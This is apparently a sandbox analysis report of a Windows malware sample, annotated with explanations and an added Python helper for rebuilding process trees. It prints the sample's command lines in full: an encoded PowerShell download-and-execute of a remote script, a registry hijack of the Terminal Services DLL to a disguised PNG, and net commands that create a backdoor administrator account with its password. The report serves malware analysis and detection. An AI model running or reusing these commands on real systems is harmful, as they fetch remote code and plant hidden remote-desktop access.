Analysis
max time kernel: 49s
max time network: 113s
platform: windows10_x64
resource: win10v20210410
submitted: 20-07-2021 09:16

Static task: static1
Behavioral task: behavioral1 (sample exe1.bin.exe, resource win7v20210408)
Behavioral task: behavioral2 (sample exe1.bin.exe, resource win10v20210410)
This page is the behavioral2 (Windows 10 x64) run.
General
Target: exe1.bin.exe
Size: 4.6MB
MD5: eaee663dfeb2efcd9ec669f5622858e2
SHA1: 2b96f0d568128240d0c53b2a191467fde440fd93
SHA256: 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512: 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
Malware Config
Extracted URL: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
This is the second-stage script location; it is the plaintext of the -enc argument passed to the last powershell.exe in the process tree (base64 over UTF-16LE, decoding to an IEX of a Net.WebClient downloadstring of this URL).
Signatures

Grants admin privileges (1 TTP)
Uses net.exe to modify the user's privileges.

Blocklisted process makes network request (9 IoCs)
Flows 15, 17, 18, 19, 21, 23, 25, 27 and 29, all from pid 4704 (powershell.exe, the process that runs the -enc payload).
Modifies RDP port number used by Windows (1 TTP)
The reg.exe call with PID 4660 in the process tree, which sets RDP-Tcp\PortNumber to 0x1C21 (7201).

Sets DLL path for service in the registry (2 TTPs)
The reg.exe call with PID 4680, which points HKLM\system\currentcontrolset\services\TermService\parameters\ServiceDLL at C:\Windows\branding\mediasrv.png.

YARA matches:
resource \Windows\Branding\mediasrv.png, rule upx
resource \Windows\Branding\mediasvc.png, rule upx
Both "image" files dropped into C:\Windows\branding are UPX-packed executables; mediasrv.png is the file the TermService ServiceDLL now names, so the service host will load it as a DLL.

Loads dropped DLL (2 IoCs)
pid 5072 (image name not recorded), two entries.
Drops file in Program Files directory (4 IoCs)
All by powershell.exe:
- File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT
- File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI
- File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT
- File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI
These are the Advanced INF Setup backups Internet Explorer writes when its per-user components (IE40.UserAgent, IE.HKCUZoneInfo) are initialised for a profile, consistent with the first web request ever made from the NETWORK SERVICE account rather than with anything sample-specific.
Drops file in Windows directory (19 IoCs)
All by powershell.exe (two PowerShell processes contribute: PID 2416 and PID 4704):
- File created C:\Windows\branding\wupsvc.jpg
- File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_kjkza3sr.cco.ps1
- File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B29.tmp
- File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat
- File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
- File created C:\Windows\branding\mediasrv.png
- File opened for modification C:\Windows\branding\Basebrd
- File opened for modification C:\Windows\branding\ShellBrd
- File opened for modification C:\Windows\branding\mediasrv.png
- File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B2A.tmp
- File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B3A.tmp
- File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
- File created C:\Windows\branding\mediasvc.png
- File opened for modification C:\Windows\branding\mediasvc.png
- File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B4B.tmp
- File opened for modification C:\Windows\branding\wupsvc.jpg
- File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_lish24en.kit.psm1
- File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP
- File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B09.tmp
Reading this list: SERVIC~2\NETWOR~1 is the 8.3 short name of ServiceProfiles\NetworkService, so every temp-path write here is under the NETWORK SERVICE profile, i.e. that PowerShell ran as NETWORK SERVICE. The __PSScriptPolicyTest_*.ps1/.psm1 files, StartupProfileData-NonInteractive and the CLR UsageLogs entry are ordinary PowerShell and .NET start-up artifacts (the policy-test files are how PowerShell probes AppLocker/WDAC script enforcement), not payloads. The sample's own drops are the three files in C:\Windows\branding: mediasrv.png, mediasvc.png and wupsvc.jpg.
Modifies data under HKEY_USERS (64 IoCs)
All 64 entries are by powershell.exe and live under \REGISTRY\USER\S-1-5-20, the NETWORK SERVICE hive; the paths below are relative to that key. The content (Internet Settings zones, ZoneMap, User Agent, Advanced INF Setup backups, SystemCertificates and WinTrust keys) is consistent with WinINet/IE and CryptoAPI initialising a profile that had never made a web request, rather than with configuration written by the sample; the sample's deliberate registry changes are the three reg.exe calls in the process tree.
- Set value (data) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 339704ea112ed701
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"
- Key created Software\Microsoft\Advanced INF Setup
- Set value (str) Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480"
- Key created Software\Microsoft\Windows
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"
- Key created Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424"
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"
- Key created Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ (empty)
- Key created Software\Microsoft\Windows\CurrentVersion\Internet Settings
- Key created Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
- Key created Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018"
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ (empty)
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"
- Key created Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup
- Key created Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"
- Key created Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ (empty)
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018"
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites"
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"
- Key created Software\Policies\Microsoft\SystemCertificates\CA\CRLs
- Key created Software\Classes\Local Settings\MuiCache
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"
- Set value (str) Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent,"
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"
- Key created Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer"
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33"
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"
- Key created Software\Policies\Microsoft\SystemCertificates\CA
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0"
- Key created Software\Microsoft\SystemCertificates\SmartCardRoot
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."
- Key created Software\Microsoft\Windows\CurrentVersion
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites"
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"
- Key created Software\Microsoft\SystemCertificates\CA\CTLs
- Set value (int) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71"
- Set value (str) Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]"
Modifies registry key (1 TTP, 1 IoC)
The reg.exe call with PID 4680 (TermService ServiceDLL) in the process tree.

Runs net.exe

Script User-Agent (4 IoCs)
Uses user-agent string associated with script host/environment.
HTTP User-Agent header on flows 17, 18, 19 and 21: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
That string is the default User-Agent of the WinHttp.WinHttpRequest.5.1 COM object. The loader's own downloadstring call uses System.Net.WebClient, which sends no User-Agent by default, so these four flows come from code in the fetched script rather than from the -enc stub.
Suspicious behavior: EnumeratesProcesses (18 IoCs)
pid / process, three entries each, in table order: 2416 powershell.exe, 3872 powershell.exe, 2008 powershell.exe, 4224 powershell.exe, 2416 powershell.exe, 4704 powershell.exe.

Suspicious behavior: LoadsDriver (2 IoCs)
pid 624 (image name not recorded), two entries.

Suspicious use of AdjustPrivilegeToken (64 IoCs; the listing stops at 64 entries, so the last process's list is cut short)
- PID 2416 powershell.exe: SeDebugPrivilege
- PID 3872 powershell.exe (22 entries): SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- PID 2008 powershell.exe (22 entries): the same list as PID 3872
- PID 4224 powershell.exe (19 entries): the same list as PID 3872 up to and including 33
The numeric entries are privilege LUIDs the sandbox did not name: 33 is SeIncreaseWorkingSetPrivilege, 34 SeTimeZonePrivilege, 35 SeCreateSymbolicLinkPrivilege and 36 SeDelegateSessionUserImpersonatePrivilege. Enabling the whole set at once is the footprint of a process enabling every privilege present in an administrative token, which fits three PowerShell children spawned by the already-elevated PID 2416.
Suspicious use of WriteProcessMemory (64 IoCs)
The sandbox lists each parent -> child write twice; the 32 distinct pairs, as "parent PID image -> child PID image", are:
- 3968 exe1.bin.exe -> 2416 powershell.exe
- 2416 powershell.exe -> 2824 csc.exe
- 2824 csc.exe -> 1428 cvtres.exe
- 2416 powershell.exe -> 3872 powershell.exe
- 2416 powershell.exe -> 2008 powershell.exe
- 2416 powershell.exe -> 4224 powershell.exe
- 2416 powershell.exe -> 4660 reg.exe
- 2416 powershell.exe -> 4680 reg.exe
- 2416 powershell.exe -> 4700 reg.exe
- 2416 powershell.exe -> 4876 net.exe
- 4876 net.exe -> 4896 net1.exe
- 2416 powershell.exe -> 4928 cmd.exe
- 4928 cmd.exe -> 4944 cmd.exe
- 4944 cmd.exe -> 4960 net.exe
- 4960 net.exe -> 4980 net1.exe
- 2416 powershell.exe -> 5000 cmd.exe
- 5000 cmd.exe -> 5016 cmd.exe
- 5016 cmd.exe -> 5032 net.exe
- 5032 net.exe -> 5052 net1.exe
- 1920 cmd.exe -> 4136 net.exe
- 4136 net.exe -> 4156 net1.exe
- 4176 cmd.exe -> 1428 net.exe
- 1428 net.exe -> 2164 net1.exe
- 2344 cmd.exe -> 2348 net.exe
- 2348 net.exe -> 4232 net1.exe
- 4324 cmd.exe -> 4416 net.exe
- 4416 net.exe -> 4432 net1.exe
- 4452 cmd.exe -> 4492 net.exe
- 4492 net.exe -> 4364 net1.exe
- 4328 cmd.exe -> 4520 net.exe
- 4520 net.exe -> 4256 net1.exe
- 4536 cmd.exe -> 4576 WMIC.exe
Every pair is a parent writing into a child it has just created, which CreateProcess does legitimately, so read this table as a process-lineage record rather than as evidence of injection into unrelated processes. Note that PID 1428 appears here first as cvtres.exe and later as net.exe: PIDs are reused within the run.
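The pairs above are a lineage record, and a bare-PID tree built from them would merge the two unrelated processes that shared PID 1428. The Python below is an added example, not part of the sandbox's output or of the sample, that parses rows in the sandbox's own row format, collapses the duplicated rows, keys every node on the (PID, image) pair, and reports PIDs seen with more than one image. SAMPLE_ROWS is a constructed subset copied from this table, duplicates included on purpose.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of rows from this report's "Suspicious use of
# WriteProcessMemory" table, in the sandbox's own layout:
#   "PID <parent> wrote to memory of <child> <parent> <parent image> <child image>"
# The sandbox lists each edge twice; the repeats are kept here deliberately.
SAMPLE_ROWS = """
PID 3968 wrote to memory of 2416 3968 exe1.bin.exe powershell.exe
PID 3968 wrote to memory of 2416 3968 exe1.bin.exe powershell.exe
PID 2416 wrote to memory of 2824 2416 powershell.exe csc.exe
PID 2416 wrote to memory of 2824 2416 powershell.exe csc.exe
PID 2824 wrote to memory of 1428 2824 csc.exe cvtres.exe
PID 2416 wrote to memory of 4876 2416 powershell.exe net.exe
PID 4876 wrote to memory of 4896 4876 net.exe net1.exe
PID 4176 wrote to memory of 1428 4176 cmd.exe net.exe
PID 1428 wrote to memory of 2164 1428 net.exe net1.exe
"""

ROW_RE = re.compile(
    r"PID (?P<ppid>\d+) wrote to memory of (?P<cpid>\d+) (?P=ppid) (?P<pimg>\S+) (?P<cimg>\S+)"
)


def parse_rows(text):
    """Unique (ppid, pimg, cpid, cimg) edges; the sandbox's repeated rows collapse."""
    edges = set()
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            edges.add((int(m["ppid"]), m["pimg"], int(m["cpid"]), m["cimg"]))
    return edges


def build_tree(edges):
    """Map (pid, image) -> sorted child (pid, image) nodes.

    Keying on the (pid, image) pair instead of the bare PID is what keeps a
    reused PID (1428: cvtres.exe, later net.exe) from merging two processes."""
    children = defaultdict(list)
    for ppid, pimg, cpid, cimg in edges:
        children[(ppid, pimg)].append((cpid, cimg))
    for node in children:
        children[node].sort()
    return children


def roots(edges):
    """Nodes that appear as a parent but never as a child."""
    parents = {(p, pi) for p, pi, _, _ in edges}
    kids = {(c, ci) for _, _, c, ci in edges}
    return sorted(parents - kids)


def render(children, node, depth=0, out=None):
    """Indented text rendering of the subtree under node; returns the lines."""
    out = [] if out is None else out
    out.append("  " * depth + f"{node[1]} (PID {node[0]})")
    for child in children.get(node, []):
        render(children, child, depth + 1, out)
    return out


def reused_pids(edges):
    """PIDs the table associates with more than one image name."""
    images = defaultdict(set)
    for ppid, pimg, cpid, cimg in edges:
        images[ppid].add(pimg)
        images[cpid].add(cimg)
    return {pid: sorted(imgs) for pid, imgs in images.items() if len(imgs) > 1}


if __name__ == "__main__":
    edges = parse_rows(SAMPLE_ROWS)
    tree = build_tree(edges)
    for root in roots(edges):
        print("\n".join(render(tree, root)))
    print("reused PIDs:", reused_pids(edges))
```

Run as a script it prints two trees (the exe1.bin.exe lineage and the orphan cmd.exe at PID 4176) and flags PID 1428; feeding it the full table from this page works the same way, since the regex only depends on the sandbox's row layout.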
Processes
Indentation and the [n] prefix follow the parent/child depth that the sandbox prints as "n⤵" after each command line. Each entry gives the image path, the command line as recorded, the PID and the signatures that fired on that process.

[1] C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe"
    PID 3968 | Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      PID 2416 | Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0oh2zeve\0oh2zeve.cmdline"
        PID 2824 | Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFF4.tmp" "c:\Users\Admin\AppData\Local\Temp\0oh2zeve\CSC73CAA211EA44F09634A317902A77D0.TMP"
          PID 1428
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        PID 3872 | Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        PID 2008 | Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
        PID 4224 | Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
        PID 4660
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        PID 4680 | Modifies registry key
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
        PID 4700
    [3] C:\Windows\system32\net.exe
        cmdline: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        PID 4876 | Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\net1.exe
          cmdline: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
          PID 4896
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        PID 4928 | Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: cmd /c net start rdpdr
          PID 4944 | Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            cmdline: net start rdpdr
            PID 4960 | Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 start rdpdr
              PID 4980
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        PID 5000 | Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: cmd /c net start TermService
          PID 5016 | Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            cmdline: net start TermService
            PID 5032 | Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 start TermService
              PID 5052
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
        PID 4248
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
        PID 2348

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user WgaUtilAcc 000000 /del
    PID 1920 | Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user WgaUtilAcc 000000 /del
      PID 4136 | Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
        PID 4156

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user WgaUtilAcc a8OeqOZ0 /add
    PID 4176 | Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user WgaUtilAcc a8OeqOZ0 /add
      PID 1428 | Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user WgaUtilAcc a8OeqOZ0 /add
        PID 2164

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    PID 2344 | Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
      PID 2348 | Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
        PID 4232

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
    PID 4324 | Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
      PID 4416 | Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
        PID 4432

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    PID 4452 | Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
      PID 4492 | Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
        PID 4364

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user WgaUtilAcc a8OeqOZ0
    PID 4328 | Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user WgaUtilAcc a8OeqOZ0
      PID 4520 | Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user WgaUtilAcc a8OeqOZ0
        PID 4256

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C wmic path win32_VideoController get name
    PID 4536 | Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic path win32_VideoController get name
      PID 4576

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C wmic CPU get NAME
    PID 4264
  [2] C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic CPU get NAME
      PID 2128

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    PID 4640
  [2] C:\Windows\system32\cmd.exe
      cmdline: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      PID 4684
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        PID 4704 | Blocklisted process makes network request; Drops file in Program Files directory; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses

